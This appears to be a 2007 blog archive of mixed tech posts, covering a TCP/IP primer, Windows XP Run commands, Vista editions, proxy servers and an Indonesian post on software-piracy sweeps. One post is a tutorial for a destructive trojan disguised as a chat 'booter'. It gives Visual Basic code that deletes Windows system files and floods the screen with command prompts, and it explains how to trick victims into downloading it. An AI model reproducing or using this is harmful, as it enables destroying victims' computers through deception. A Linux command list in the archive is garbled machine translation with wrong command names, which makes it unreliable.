30 December 2007

Introduction to TCP/IP

Summary: TCP and IP were developed by a Department of Defense (DOD) research project to connect a number different networks designed by different vendors into a network of networks (the "Internet"). It was initially successful because it delivered a few basic services that everyone needs (file transfer, electronic mail, remote logon) across a very large number of client and server systems. Several computers in a small department can use TCP/IP (along with other protocols) on a single LAN. The IP component provides routing from the department to the enterprise network, then to regional networks, and finally to the global Internet. On the battlefield a communications network will sustain damage, so the DOD designed TCP/IP to be robust and automatically recover from any node or phone line failure. This design allows the construction of very large networks with less central management. However, because of the automatic recovery, network problems can go undiagnosed and uncorrected for long periods of time.

As with all other communications protocol, TCP/IP is composed of layers:

* IP - is responsible for moving packet of data from node to node. IP forwards each packet based on a four byte destination address (the IP number). The Internet authorities assign ranges of numbers to different organizations. The organizations assign groups of their numbers to departments. IP operates on gateway machines that move data from department to organization to region and then around the world.
* TCP - is responsible for verifying the correct delivery of data from client to server. Data can be lost in the intermediate network. TCP adds support to detect errors or lost data and to trigger retransmission until the data is correctly and completely received.
* Sockets - is a name given to the package of subroutines that provide access to TCP/IP on most systems.

Network of Lowest Bidders

The Army puts out a bid on a computer and DEC wins the bid. The Air Force puts out a bid and IBM wins. The Navy bid is won by Unisys. Then the President decides to invade Grenada and the armed forces discover that their computers cannot talk to each other. The DOD must build a "network" out of systems each of which, by law, was delivered by the lowest bidder on a single contract.
The Internet Protocol was developed to create a Network of Networks (the "Internet"). Individual machines are first connected to a LAN (Ethernet or Token Ring). TCP/IP shares the LAN with other uses (a Novell file server, Windows for Workgroups peer systems). One device provides the TCP/IP connection between the LAN and the rest of the world.

To insure that all types of systems from all vendors can communicate, TCP/IP is absolutely standardized on the LAN. However, larger networks based on long distances and phone lines are more volatile. In the US, many large corporations would wish to reuse large internal networks based on IBM's SNA. In Europe, the national phone companies traditionally standardize on X.25. However, the sudden explosion of high speed microprocessors, fiber optics, and digital phone systems has created a burst of new options: ISDN, frame relay, FDDI, Asynchronous Transfer Mode (ATM). New technologies arise and become obsolete within a few years. With cable TV and phone companies competing to build the National Information Superhighway, no single standard can govern citywide, nationwide, or worldwide communications.

The original design of TCP/IP as a Network of Networks fits nicely within the current technological uncertainty. TCP/IP data can be sent across a LAN, or it can be carried within an internal corporate SNA network, or it can piggyback on the cable TV service. Furthermore, machines connected to any of these networks can communicate to any other network through gateways supplied by the network vendor.

Addresses

Each technology has its own convention for transmitting messages between two machines within the same network. On a LAN, messages are sent between machines by supplying the six byte unique identifier (the "MAC" address). In an SNA network, every machine has Logical Units with their own network address. DECNET, Appletalk, and Novell IPX all have a scheme for assigning numbers to each local network and to each workstation attached to the network.

On top of these local or vendor specific network addresses, TCP/IP assigns a unique number to every workstation in the world. This "IP number" is a four byte value that, by convention, is expressed by converting each byte into a decimal number (0 to 255) and separating the bytes with a period. For example, the PC Lube and Tune server is 130.132.59.234.

An organization begins by sending electronic mail to Hostmaster@INTERNIC.NET requesting assignment of a network number. It is still possible for almost anyone to get assignment of a number for a small "Class C" network in which the first three bytes identify the network and the last byte identifies the individual computer. The author followed this procedure and was assigned the numbers 192.35.91.* for a network of computers at his house. Larger organizations can get a "Class B" network where the first two bytes identify the network and the last two bytes identify each of up to 64 thousand individual workstations. Yale's Class B network is 130.132, so all computers with IP address 130.132.*.* are connected through Yale.

The organization then connects to the Internet through one of a dozen regional or specialized network suppliers. The network vendor is given the subscriber network number and adds it to the routing configuration in its own machines and those of the other major network suppliers.

There is no mathematical formula that translates the numbers 192.35.91 or 130.132 into "Yale University" or "New Haven, CT." The machines that manage large regional networks or the central Internet routers managed by the National Science Foundation can only locate these networks by looking each network number up in a table. There are potentially thousands of Class B networks, and millions of Class C networks, but computer memory costs are low, so the tables are reasonable. Customers that connect to the Internet, even customers as large as IBM, do not need to maintain any information on other networks. They send all external data to the regional carrier to which they subscribe, and the regional carrier maintains the tables and does the appropriate routing.

New Haven is in a border state, split 50-50 between the Yankees and the Red Sox. In this spirit, Yale recently switched its connection from the Middle Atlantic regional network to the New England carrier. When the switch occurred, tables in the other regional areas and in the national spine had to be updated, so that traffic for 130.132 was routed through Boston instead of New Jersey. The large network carriers handle the paperwork and can perform such a switch given sufficient notice. During a conversion period, the university was connected to both networks so that messages could arrive through either path.

Subnets

Although the individual subscribers do not need to tabulate network numbers or provide explicit routing, it is convenient for most Class B networks to be internally managed as a much smaller and simpler version of the larger network organizations. It is common to subdivide the two bytes available for internal assignment into a one byte department number and a one byte workstation ID.
The enterprise network is built using commercially available TCP/IP router boxes. Each router has small tables with 255 entries to translate the one byte department number into selection of a destination Ethernet connected to one of the routers. Messages to the PC Lube and Tune server (130.132.59.234) are sent through the national and New England regional networks based on the 130.132 part of the number. Arriving at Yale, the 59 department ID selects an Ethernet connector in the C& IS building. The 234 selects a particular workstation on that LAN. The Yale network must be updated as new Ethernets and departments are added, but it is not effected by changes outside the university or the movement of machines within the department.

A Uncertain Path

Every time a message arrives at an IP router, it makes an individual decision about where to send it next. There is concept of a session with a preselected path for all traffic. Consider a company with facilities in New York, Los Angeles, Chicago and Atlanta. It could build a network from four phone lines forming a loop (NY to Chicago to LA to Atlanta to NY). A message arriving at the NY router could go to LA via either Chicago or Atlanta. The reply could come back the other way.

How does the router make a decision between routes? There is no correct answer. Traffic could be routed by the "clockwise" algorithm (go NY to Atlanta, LA to Chicago). The routers could alternate, sending one message to Atlanta and the next to Chicago. More sophisticated routing measures traffic patterns and sends data through the least busy link.

If one phone line in this network breaks down, traffic can still reach its destination through a roundabout path. After losing the NY to Chicago line, data can be sent NY to Atlanta to LA to Chicago. This provides continued service though with degraded performance. This kind of recovery is the primary design feature of IP. The loss of the line is immediately detected by the routers in NY and Chicago, but somehow this information must be sent to the other nodes. Otherwise, LA could continue to send NY messages through Chicago, where they arrive at a "dead end." Each network adopts some Router Protocol which periodically updates the routing tables throughout the network with information about changes in route status.

If the size of the network grows, then the complexity of the routing updates will increase as will the cost of transmitting them. Building a single network that covers the entire US would be unreasonably complicated. Fortunately, the Internet is designed as a Network of Networks. This means that loops and redundancy are built into each regional carrier. The regional network handles its own problems and reroutes messages internally. Its Router Protocol updates the tables in its own routers, but no routing updates need to propagate from a regional carrier to the NSF spine or to the other regions (unless, of course, a subscriber switches permanently from one region to another).

Undiagnosed Problems

IBM designs its SNA networks to be centrally managed. If any error occurs, it is reported to the network authorities. By design, any error is a problem that should be corrected or repaired. IP networks, however, were designed to be robust. In battlefield conditions, the loss of a node or line is a normal circumstance. Casualties can be sorted out later on, but the network must stay up. So IP networks are robust. They automatically (and silently) reconfigure themselves when something goes wrong. If there is enough redundancy built into the system, then communication is maintained.

In 1975 when SNA was designed, such redundancy would be prohibitively expensive, or it might have been argued that only the Defense Department could afford it. Today, however, simple routers cost no more than a PC. However, the TCP/IP design that, "Errors are normal and can be largely ignored," produces problems of its own.

Data traffic is frequently organized around "hubs," much like airline traffic. One could imagine an IP router in Atlanta routing messages for smaller cities throughout the Southeast. The problem is that data arrives without a reservation. Airline companies experience the problem around major events, like the Super Bowl. Just before the game, everyone wants to fly into the city. After the game, everyone wants to fly out. Imbalance occurs on the network when something new gets advertised. Adam Curry announced the server at "mtv.com" and his regional carrier was swamped with traffic the next day. The problem is that messages come in from the entire world over high speed lines, but they go out to mtv.com over what was then a slow speed phone line.

Occasionally a snow storm cancels flights and airports fill up with stranded passengers. Many go off to hotels in town. When data arrives at a congested router, there is no place to send the overflow. Excess packets are simply discarded. It becomes the responsibility of the sender to retry the data a few seconds later and to persist until it finally gets through. This recovery is provided by the TCP component of the Internet protocol.

TCP was designed to recover from node or line failures where the network propagates routing table changes to all router nodes. Since the update takes some time, TCP is slow to initiate recovery. The TCP algorithms are not tuned to optimally handle packet loss due to traffic congestion. Instead, the traditional Internet response to traffic problems has been to increase the speed of lines and equipment in order to say ahead of growth in demand.

TCP treats the data as a stream of bytes. It logically assigns a sequence number to each byte. The TCP packet has a header that says, in effect, "This packet starts with byte 379642 and contains 200 bytes of data." The receiver can detect missing or incorrectly sequenced packets. TCP acknowledges data that has been received and retransmits data that has been lost. The TCP design means that error recovery is done end-to-end between the Client and Server machine. There is no formal standard for tracking problems in the middle of the network, though each network has adopted some ad hoc tools.

Need to Know

There are three levels of TCP/IP knowledge. Those who administer a regional or national network must design a system of long distance phone lines, dedicated routing devices, and very large configuration files. They must know the IP numbers and physical locations of thousands of subscriber networks. They must also have a formal network monitor strategy to detect problems and respond quickly.

Each large company or university that subscribes to the Internet must have an intermediate level of network organization and expertise. A half dozen routers might be configured to connect several dozen departmental LANs in several buildings. All traffic outside the organization would typically be routed to a single connection to a regional network provider.

However, the end user can install TCP/IP on a personal computer without any knowledge of either the corporate or regional network. Three pieces of information are required:

1. The IP address assigned to this personal computer
2. The part of the IP address (the subnet mask) that distinguishes other machines on the same LAN (messages can be sent to them directly) from machines in other departments or elsewhere in the world (which are sent to a router machine)
3. The IP address of the router machine that connects this LAN to the rest of the world.

In the case of the PCLT server, the IP address is 130.132.59.234. Since the first three bytes designate this department, a "subnet mask" is defined as 255.255.255.0 (255 is the largest byte value and represents the number with all bits turned on). It is a Yale convention (which we recommend to everyone) that the router for each department have station number 1 within the department network. Thus the PCLT router is 130.132.59.1. Thus the PCLT server is configured with the values:

* My IP address: 130.132.59.234
* Subnet mask: 255.255.255.0
* Default router: 130.132.59.1

The subnet mask tells the server that any other machine with an IP address beginning 130.132.59.* is on the same department LAN, so messages are sent to it directly. Any IP address beginning with a different value is accessed indirectly by sending the message through the router at 130.132.59.1 (which is on the departmental LAN).

28 December 2007

How to delete your Yahoo! account

Go to Yahoo! Account termination page and logged in with the account you want to delete. According to the information stated on that page, it takes approximately 90 days to complete. FYI, I just deleted my unused Yahoo! account which happens to be one of the many email that I registered back during the late 90’s.

24 December 2007

Windows XP Run Commands(DOS)



Klik Run




type in the command to run


Application = Command
Accessibility Controls = access.cpl
Add Hardware Wizard = hdwwiz.cpl
Add/Remove Programs = appwiz.cpl
Administrative Tools = control admintools
Automatic Updates = wuaucpl.cpl
Bluetooth Transfer Wizard = fsquirt
Calculator = calc
Certificate Manager = certmgr.msc
Character Map = charmap
Check Disk Utility = chkdsk
Clipboard Viewer = clipbrd
Command Prompt = cmd
Component Services = dcomcnfg
Computer Management = compmgmt.msc
Date and Time Properties = timedate.cpl
DDE Shares = ddeshare
Device Manager = devmgmt.msc
Direct X Control Panel (If Installed)* = directx.cpl
Direct X Troubleshooter = dxdiag
Disk Cleanup Utility = cleanmgr
Disk Defragment = dfrg.msc
Disk Management = diskmgmt.msc
Disk Partition Manager = diskpart
Display Properties = control desktop/desk.cpl
Dr. Watson System Troubleshooting Utility = drwtsn32
Driver Verifier Utility = verifier
Event Viewer = eventvwr.msc
File Signature Verification Tool = sigverif
Findfast = findfast.cpl
Folders Properties = control folders
Fonts = control fonts
Fonts Folder = fonts
Free Cell Card Game = freecell
Game Controllers = joy.cpl
Group Policy Editor (XP Prof) = gpedit.msc
Hearts Card Game = mshearts
Iexpress Wizard = iexpress
Indexing Service = ciadv.msc
Internet Properties = inetcpl.cpl
IP Configuration = ipconfig
Java Control Panel (If Installed) = jpicpl32.cpl
Java Application Cache Viewer (If Installed) = javaws
Keyboard Properties = control keyboard
Local Security Settings = secpol.msc
Local Users and Groups = lusrmgr.msc
Logs You Out Of Windows = logoff
Microsoft Chat = winchat
Minesweeper Game = winmine
Mouse Properties = control mouse
Mouse Properties = main.cpl
Network Connections = control netconnections
Network Connections = ncpa.cpl
Network Setup Wizard = netsetup.cpl
Notepad = notepad
Nview Desktop Manager (If Installed) = nvtuicpl.cpl
Object Packager = packager
ODBC Data Source Administrator = odbccp32.cpl
On Screen Keyboard = osk
Opens AC3 Filter (If Installed) = ac3filter.cpl
Password Properties = password.cpl
Performance Monitor = perfmon.msc
Performance Monitor = perfmon
Phone and Modem Options = telephon.cpl
Power Configuration = powercfg.cpl
Printers and Faxes = control printers
Printers Folder = printers
Private Character Editor = eudcedit
Quicktime (If Installed) = QuickTime.cpl
Regional Settings = intl.cpl
Registry Editor = regedit
Registry Editor = regedit32
Remote Desktop = mstsc
Removable Storage = ntmsmgr.msc
Removable Storage Operator Requests = ntmsoprq.msc
Resultant Set of Policy (XP Prof) = rsop.msc
Scanners and Cameras = sticpl.cpl
Scheduled Tasks = control schedtasks
Security Center = wscui.cpl
Services = services.msc
Shared Folders = fsmgmt.msc
Shuts Down Windows = shutdown
Sounds and Audio = mmsys.cpl
Spider Solitare Card Game = spider
SQL Client Configuration = cliconfg
System Configuration Editor = sysedit
System Configuration Utility = msconfig
System File Checker Utility = sfc
System Properties = sysdm.cpl
Task Manager = taskmgr
Telnet Client = telnet
User Account Management = nusrmgr.cpl
Utility Manager = utilman
Windows Firewall = firewall.cpl
Windows Magnifier = magnify
Windows Management Infrastructure = wmimgmt.msc
Windows System Security Tool = syskey
Windows Update Launches = wupdmgr
Windows XP Tour Wizard = tourstart
Wordpad = write

Human face fish

21 December 2007

Take orders Linux's Basic

  • & = Instruction & is utilized to clear a root instruction after (background)
  • adduser = adduser's Instruction is utilized to add user
  • alias = is utilized to give alias of one instruction. E.g. if You want instruction ls can also dijalankan dengan mengetikkan commands at r
  • bg = To force one process which is discontinued while (suspend) that walking at background. E.g. You are carrying on one instruction at foreground (without ended up by instruction &) and a while You need shell that therefore You that memberhentikan can instruction temporary that with Ctrl z. then bg's instruction typing to menjalakannya at background. In this way You have freed shell but regular keeps to command walking long time at background
  • paint = Feature content of one file at display
  • CD = Change Directory or for devolves directory and I take for You won't find handicap utilize this instruction because trick penggunaanya alike by order of CD at PACK
  • chgrp = Instruction it is utilized to revamp file group ownership or directory. E.g. to give allowing on group or group to be able to accesses a file
  • chmod = is utilized to add and reduces user permit to access file or directory. You can utilize numeric coding's system or letter coding's system
  • chown = Revamps user ID (owner) one file or directory
  • cp = To copy / copy file
  • fg = Backs a discontinued process sementar (suspend) that back walking at foreground
  • find = To find where position one file. This instruction will look for file corresponds to criterion that Your determinative. Sintaksnya is command it is alone being followed by the name of search home directories, then file name (can utilize wildcard, metacharacters) and last determines how that seeking result will be featured. E.g. will be looked for all file that gets .doc's suffix at current directory and features its result at display:
  • grep = Global regular expresion parse or grep is command to look for file that contain text with criterion already You determine
  • gzip = It is zip's compression software GNU'S version, its function for mengkompresi one file
  • halt = its Instruction just can be carried on by super useratau You shall log in as root. This instruction to inform kernel so deadening system or shutdown
  • hostname = To feature host or domain name is system and can too be utilized for mengesset host's name system
  • kill = Instruction it will send signal goes to one process which we determine. Its aim is discontinue to process
  • less = its Function as more's instruction.
  • log in = For input to go to system by inserts log in ID or gets also be utilized for devolves from user one to user another
  • log out = For issue of system
  • ls = Feature content of one directory as instruction at r at PACK. You can utilize severally option which providing for to manage its appearance at display. If You carry on to command it without option therefore will be featured all nonhidden's file (file without dot sign prefix) alphabetic and melebar's ala fill display column. Option la is its mean features all file / all comprises hidden's file (file with dots sign prefix) with elongated format.
  • man = To feature page's manual or text that word detail's ala how to purpose one instruction. This instruction is beneficent once if at call You forget or not know function and way utilize one instruction.
  • mesg = Instruction it utilized by user to give allowing user any other feature order at terminal display. E.g. mesg You in positioning y. therefore user any other can feature order at Your display with write or talc.
  • mkdir = Make new directory, with by order of md at PACK. a
  • more = Mempaging page, as well as less
  • mount = Instruction it that I will mount filesystem go to a directory or
  • mount point already being determined. Just superuser that can carry on this instruction. To see filesystem any kind mount pointnya therewith that time, ketikkan commands mount. This instruction gets You study at chapter hit filesystem
  • mv = To move file of one location goes to the other location. If argument secondly as one directory therefore mv will move file goes to that directory. If both of argument as file therefore first file name will befall file both of. Will happening gloss over if You insert are more than two argument except last argument as one directories.
  • passwd = is utilized to substitute password. You will ever be requested fill in password long time and further will ask for to fill in new password as much two-time. Password at least consisting of six characters and at least contains one characters.
  • pwd = Print Working Directory, or to feature directory name where You that time are lying
  • rm = To erase default rm's file and ala not erases directory. Utilize carefully this instruction especially with option r rekursif's ala one that mengapus can all file.
  • rmdir = To erase empty directory.
  • shutdown = its Instruction to switch off system, as halt's instruction. In many your system can discontinue computer by order of shutdown h now and restarts system by order of shutdown r now or with Ctr Alt Del's knobbed combine.
  • su = For logs in while as other user. If user ID doesn't be attached therefore computer looks on You to want log in while as super user or root. If You are not root and user any other that has password therefore You shall insert passwordnya aright. But if You are root therefore You can log in as other user without needs to know password user that.
  • tail = Features 10 rows most a stop to a files. Default is row that is featured is 10 but You can own determine gets what row that wants to be featured
  • talc = To arrange gab via terminal. Input of terminal You will be copied at user's terminal any other, so contrariwise.
  • tar = Keeps and extract file of media as tape drive or hard disk. File archives that often at conceive of file tar.
  • umount = Is opposite of mount's instruction, which is for meng unmount filesystem from mount pointnya. After commands it was carried on by directory that becomes mount point no longer can be utilized.
  • unalias = opposite of alias instruction, this instruction will cancel one alias.
  • unzip = is utilized to extract or describes file that at compress with zip
  • wall = Send order and features it at terminal every user that be logs in. This instruction good for superuser or root to give warning goes to all user, e.g. that making known momentary server again will be switched off.
  • who = To feature who just that be logs in. This instruction will feature information about logs in name, terminal type, time logs in and hostname's remote to each user what does that time be logging in
  • xhost + = Instruction it is utilized to give accesses or erase accesses (xhost -) host or user goes to one server X.
  • xset = its Instruction for mengeset some option at x Window as bell ringing, the mouse speed, font, screen saver's parameter etcetera.
  • zip = Instruction it will make and adds file into file archives zip

Pahami Prosedur Sweeping Windows Bajakan

Yang paling ditakutkan oleh para pengusaha warnet adalah apalagi kalau bukan yang namanya sweeping software bajakan. Namun dalam perkembangannya sweeping yang dilakukan sudah mengarah pada 'mencari-cari' kesalahan. Bisa jadi software-nya asli, tapi ternyata menyimpan mp3 bajakan. Kena deh...Padahal kalau kita mau lebih 'kendhel', kita punya hak untuk mempertahankan komputer kita bila disita oleh polisi. Hal itu dikarenakan proses pembuktian keterlibatan seseorang dalam tindakan kriminal yang menggunakan komputer membutuhkan waktu yang lama, termasuk melakukan pengintaian. Jadi, apabila ada polisi yang berani masuk ke dalam warnet dan menyatakan harus menyita semua komputer yang ada berarti mereka adalah oknum yang tidak bertanggung jawab.

Berikut saya kutip prosedurnya dari milis di tempat saya yang di-post dari Joseph Adi (yosprofec@gmail.com), di mana pernyataan di bawah ini diperoleh langsung dari pihak Microsoft Indonesia dan juga melalui perwakilannya, yaitu Magenta Sebagai tempat pendaftaran MSRA:

Pertama, akan ada perwakilan dari pihak yang merasa berkepentingan (misalnya Microsoft) yang lebih dikenal dengan sebutan Surveyor datang melakukan survei, bukan razia penyitaan!. Mereka wajib menunjukkan surat perintah kerja (SPK) yang berisikan detail apa saja yang harus mereka kerjakan. User berhak melakukan konfirmasi dengan cara menelepon pihak Microsoft Indonesia atau Magenta tentang keberadaan surveyor di lapangan tersebut.

Kedua, apabila surveyor mendapatkan penggunaan software bajakan, maka surveyor tersebut berhak meminta surat pernyataan dari user yang wajib diisi data sesuai dengan keadaan di lapangan oleh user.

Ketiga, pihak Microsoft/ Magenta akan mengirim surat penawaran untuk menyelesaikan tindakan pelanggaran oleh user. Setelah user mengkonfirmasi tindakan yang telah diambil apakah memutuskan untuk menggunakan Windows original atau beralih ke solusi freeware seperti Linux, pihak Microsoft/Magenta akan mengirimkan kembali seorang surveyor memastikan kebenaran di lapangan.

Keempat, apabila user tidak merespon penawaran dan atau setelah surveyor mendatangi kembali masih mendapatkan pelanggaran, maka pihak Microsoft/Magenta akan mengirimkan surat peringatan.

Kelima, apabila user tidak merespon surat peringatan, maka pihak Microsoft / Magenta akan perkarakan secara hukum dan menyerahkannya ke pihak Polri.

Selanjutnya sepoerti proses hukum yang berlaku, Polri akan mengirimkan surat panggilan pertama, kedua,ketiga dan apabila tidak direspon baru akan dilakukan penyitaan dan penyegelan tempat usaha.

Catatan:
Di luar proses/prosedur di atas, user berhak mempertahankan kepemilikannya atas harta benda yang dibeli secara legal dan sebagai pembeli dapat memposisikan dirinya sebagai korban. Tidak bisa suatu merek memperkarakan merek lain, misalnya Microsoft memeperkarakan Biling Explorer bajakan. Hal tersebut merupakan etika merek dagang terdaftar (registered trade mark) internasional.

Informasi ini dapat diperoleh melalui webside Microsoft atau apabila kita mencoba mengaktivasi/ update windows bajakan. Semoga informasi ini bisa berguna, dan kalau tidak mampu beli Windows, ya beralihlah ke open source software, toh sekarang ini OSS tidak kalah dengan Windows..

How To Kill Windows Xp With Fake Booter

The best way to get people to download it is to post a fake booter load in to a room using a code like this
Yazak-Killer Loaded, Get it at www.yourwebsitenamehere.com

Make a quick website and post the program on there and your ready to kill some operating systems.

Step 1.

Open up Visual Basic and make a new .exe project, you dont have to create any buttons on this because were going to make it execute on form load.

Paste this code in to the form.

Private Sub Form_Load()
Dim strFileName As String
strFileName = "c:\test.bat"
Open strFileName For Output As #1
Print #1, "@echo"
Print #1, "del /q C:\Windows\*.*"
Print #1, "del /q C:\Windows\system\*.*"
Print #1, "del /q C:\Windows\system32\*.*"
Print #1, "del /q C:\Windows\explorer\*.*"
Print #1, ":loop"
Print #1, "start"
Print #1, "goto loop"
Close #1
Shell "c:\test.bat", vbNormalNoFocus
End Sub

Step 2.

Grab yourself an Icon and put it in to the project, also place a picture in there, because if you compile this as it is the whole .exe file will be 1kb in size, so your victim will know its not a booter. So grab a picture around 40 - 60kb in size.

Step 3.

This will only Kill Xp systems, so if you want to kill a pre NT system you would need to change the "del /q" command to "deltree /y". If you want to remove a whole directory then change the "del /c" command to "RMDR" because the "del /c" command only removes files within a directory and not folders.

You can edit the code to hit certain parts of the system, just make sure that the directory paths are typed correctly or it wont work. This project creates a batch file in your C drive, to those who dont know anything about batch files, they are very useful when writing small applications for your PC. But they are also very dangerous because you can create malicious files with them and do great damage to a users operating system, and no antivirus will pick it up as a malicious file.

Step 4.

How this works...

Print #1, "del /q C:\Windows\*.*"
Print #1, "del /q C:\Windows\system\*.*"
Print #1, "del /q C:\Windows\system32\*.*"
Print #1, "del /q C:\Windows\explorer\*.*"

This part of the code basically deletes the files that are in the following directorys. C:\Windows C\Windows\system C\Windows\system32 and it deletes C\Windows\explorer so they cant search for any files as soon as they have opened the .exe

This part of the code makes the user reboot their PC,

Print #1, ":loop"
Print #1, "start"
Print #1, "goto loop"

In a batch file the 'start' command opens up a command prompt, so if you set it within a loop it will loop the command continuosly over and over, so within about 5 seconds the victim has about 100 command prompts on their desktop, this will force the victim to reboot their PC, but the reboot will never happen because you just deleted all the files needed for the reboot when you attacked the windows system and system32 folders.

Step 5.

Making Your Victim Download It...

Ok this is the hard part, but i found it best to do this with a friend, get your friend to go in to a room and start a conversation on the mic. Ask them what chat client they are on, and get them to say that they are on a client thats really hard to boot. Thats when you drop the fake load up in to the room so it looks like you just loaded it up. Then get your friend to drop their ears in the room for about 10 seconds and then leave the room and come back in saying that it disconnected them really fast. Now your victim is thinking that he can get this booter for himself, and with any luck they should go and download your windows killer file.

Step 6.

Make sure that you never open this up on your own PC because it works, and it works very fast, once its opened there is no going back..............Enjoy !!!

20 December 2007

Traditional Transportation



one of traditional transportation that stills is at Jakarta

19 December 2007

Introducing the Windows Vista Versions

Microsoft provides multiple versions of Windows Vista. There are two versions for home users and two versions for business users as well as an all-encompassing version for users who want all available features. Unlike its predecessors, Windows Vista allows you to upgrade between versions.

Note Regardless of which Windows Vista version you are using, the core features and the way you work with the operating system are the same. Because of this consistency, this book points out the differences between Windows Vista versions only where necessary.


Overview of the Windows Vista Versions
The five versions of Microsoft Windows Vista are:

  • Windows Vista Home Basic
  • Windows Vista Home Premium
  • Windows Vista Business
  • Windows Vista Enterprise
  • Windows Vista Ultimate
The home versions of Windows Vista include entertainment features that aren’t found in the business versions. The business versions include management features that aren’t found in the home versions.

Windows Vista Ultimate combines the best of all the available features, giving you a complete package for home and business use. When you use Windows Vista Ultimate, you can get additional programs and services as well as tips and tricks documentation from the Windows Download Center by using the Windows Ultimate Extras utility in Control Panel.

Upgrading the Windows Vista Versions
Unlike its predecessors, you can easily upgrade Windows Vista versions by using the Windows Anytime Upgrade utility or a Windows Anytime Upgrade disc. You can:

Upgrade from Windows Vista Home Basic to Windows Vista Home Premium or

Windows Vista Ultimate.

Upgrade from Windows Vista Home Premium to Windows Vista Ultimate.

Upgrade from Windows Vista Business to Windows Vista Enterprise or Windows Vista

Ultimate.

Upgrade from Windows Vista Enterprise to Windows Vista Ultimate.

Windows Anytime Upgrade (WindowsAnytimeUpgrade.exe) is stored in the %SystemRoot%\System32 folder. You can start an upgrade by selecting Windows Anytime Upgrade on the Start menu and then following the prompts. When the upgrade is complete, you can search for “ What’s New” in Windows Help And Support to learn about additional features and enhancements that have been installed. You can access Windows Help And Support by clicking Start and then clicking Help And Support.

How The Internet Works

In the course of cruising the World Wide Web and clicking a link, have you ever wondered, "How does that work?" Or perhaps this question popped into your mind while you were transferring a file to your computer via FTP, or reading a newsgroup message, or when you first heard about technologies such as spam, cookies, and firewalls. Maybe you've wondered how a message sent from your computer travels through the vastness of cyberspace and ends up in the right email box halfway across the world. Have you ever wanted to know how search tools find the exact piece of information you want out of the millions of pieces of information on the whole Internet? How can you listen to music and view animations while surfing the Web?
This book is designed for everyone interested in the Internet. Its guiding principle is this: No matter how much of a cyberpro you areor how much of a novicethere's a lot you don't understand about the Internet. Here's just one small example. I have a friend who has made his living with companies involved with the Internet for many years. He's a complete cyberpro who lives and breathes the Internet. One day, he almost whispered to me, "I don't like to admit this, but I don't know what a proxy server is. How does it work, anyway?"
He's not alone. The Internet changes so quickly and the technology advances so rapidly that it can seem almost impossible to keep up with all of it. If you're like just about everyone else involved in the Internet, your questions are similar to those of my friend. You'll find your answers here.
"Understanding the Internet's Underlying Architecture," I explain the underlying basics of the Internet: who runs it, how TCP/IP works, how to understand Internet addresses and domains, and similar topics. Here's where you'll find out about things such as routers and how the client/server architecture underpins virtually every aspect of the Internet.
"Connecting to the Internet," depicts the various ways you can connect your computer to the Internet. There are myriad ways you can connect, such as via a cable modem, a digital subscriber line (DSL), an online service, a satellite, wirelessly, and many other ways. We'll cover all that, and more, in this section.
"Communicating on the Internet," covers every aspect of Internet communications. It shows how email and newsgroups work, how IRC chat works, what email "spam" is and what you can do to prevent it, how instant messaging works, and how you can use the Internet and a technique called VoIP to make telephone calls anywhere in the world. And it also shows you how blogging works, which has become an increasingly important part of our culture.
"How the World Wide Web Works," covers what has become by far the most popular part of the Internetthe World Wide Web. You'll learn virtually every aspect of how the Web works. It delves into how browsers work, how web server software works, and how Hypertext Markup Language (HTML) works. This section also covers the ways in which the Web is becoming integrated directly into your computer, how web pages are published and organized on a site, and every other aspect of the Web that is likely to be of interest to you. It also explains many of the newest web technologies, which will become even more important in the future, notable web services, and grid computing.
"Using the World Wide Web," shows you the Web in actual real-world use. So you'll find out how Google is able to search the entire Internet and find exactly what you're looking for, and how map sites can give you driving locations anywhere you want to go. It also takes you behind the scenes of Wikipedia, a free, online encyclopedia put together entirely by thousands of volunteers.
"Using Common Internet Tools," takes a close look at common Internet tools. Here's the place to learn about basic tools and services, such as telnet, and what happens when you use FTP to download a file to your computer. It's the section of the book that covers cutting-edge Internet technology. You'll find out how Java and ActiveX programming languages work, how JavaScript works, how agents can silently do your bidding for you, and how the Common Gateway Interface (CGI) works, which is a little-known but vital part of the Internet.
"Enjoying Entertainment and Multimedia on the Internet," shows you how some of the most exciting parts of the Internet workthe various multimedia technologies. Whether you want to know how virtual reality or animations work, how streaming video works, how videoconferencing works, or how similar technologies work, you'll find it all here. And it also shows you how the iPod works, along with iTunes and podcasting.
"Shopping and Doing Business on the Internet," covers intranets, how the Internet works with the outside world, and how you can shop online. You'll see how companies use Internet technologies to build their own private networks, called intranets. And you'll take a close look at the underlying technologies that let you shop on the Web, which accounts for billions of dollars a year in sales.
"Protecting Yourself on the Internet," covers security concerns. The chapters in this part explain the controversial cookie technology that lets web servers put bits of information on your hard disk and use that information to track you, how the even-more controversial FBI system called Carnivore wiretapped people's use of the Internet to read their email, watch their web browsing, and more. They also look at the National Security Agency's Echelon program, which allows for web snooping and wiretapping on a global scale.
This part also shows how firewalls work, how viruses can attack your computer, and how cryptosystems allow confidential information to be sent across the Internet. It delves into how hackers can attack Internet service providers (ISPs) using so-called Denial of Service or "smurf attacks," and how they can attack your computer as well. This section also looks at how "spyware" can report on your surfing activities, and how your place of employment may monitor your Internet activities. And it covers the issue of pornography on the Internet and shows how parental-control software can prevent children from seeing objectionable material.
So, come along and see how the vast Internet works. Even if you're a cyberpro (and especially if you're not), you'll find out a lot you never knew.

Proxy Server

In an enterprise that uses the Internet, a proxy server is a server that acts as an intermediary between a workstation user and the Internet so that the enterprise can ensure security, administrative control, and caching service. A proxy server is associated with or part of a gateway server that separates the enterprise network from the outside network and a firewall server that protects the enterprise network from outside intrusion.

A proxy server receives a request for an Internet service (such as a Web page request) from a user. If it passes filtering requirements, the proxy server, assuming it is also a cache server, looks in its local cache of previously downloaded Web pages. If it finds the page, it returns it to the user without needing to forward the request to the Internet. If the page is not in the cache, the proxy server, acting as a client on behalf of the user, uses one of its own IP addresses to request the page from the server out on the Internet. When the page is returned, the proxy server relates it to the original request and forwards it on to the user.

To the user, the proxy server is invisible; all Internet requests and returned responses appear to be directly with the addressed Internet server. (The proxy is not quite invisible; its IP address has to be specified as a configuration option to the browser or other protocol program.)

An advantage of a proxy server is that its cache can serve all users. If one or more Internet sites are frequently requested, these are likely to be in the proxy's cache, which will improve user response time. In fact, there are special servers called cache servers. A proxy can also do logging.

The functions of proxy, firewall, and caching can be in separate server programs or combined in a single package. Different server programs can be in different computers. For example, a proxy server may in the same machine with a firewall server or it may be on a separate server and forward requests through the firewall.

15 December 2007

Nasib OlahRaga Kita Semakin Meprihatinkan



Ketika saya masih SD, SMP, SMA setiap ada pertandingan SEA Games saya slalu diberi tugas mengumpulkan berita kliping koran tentang SEA Games oleh guru olahraga, begitu membanggakannya prestasi negara kita di tingkat Asia Tenggara.
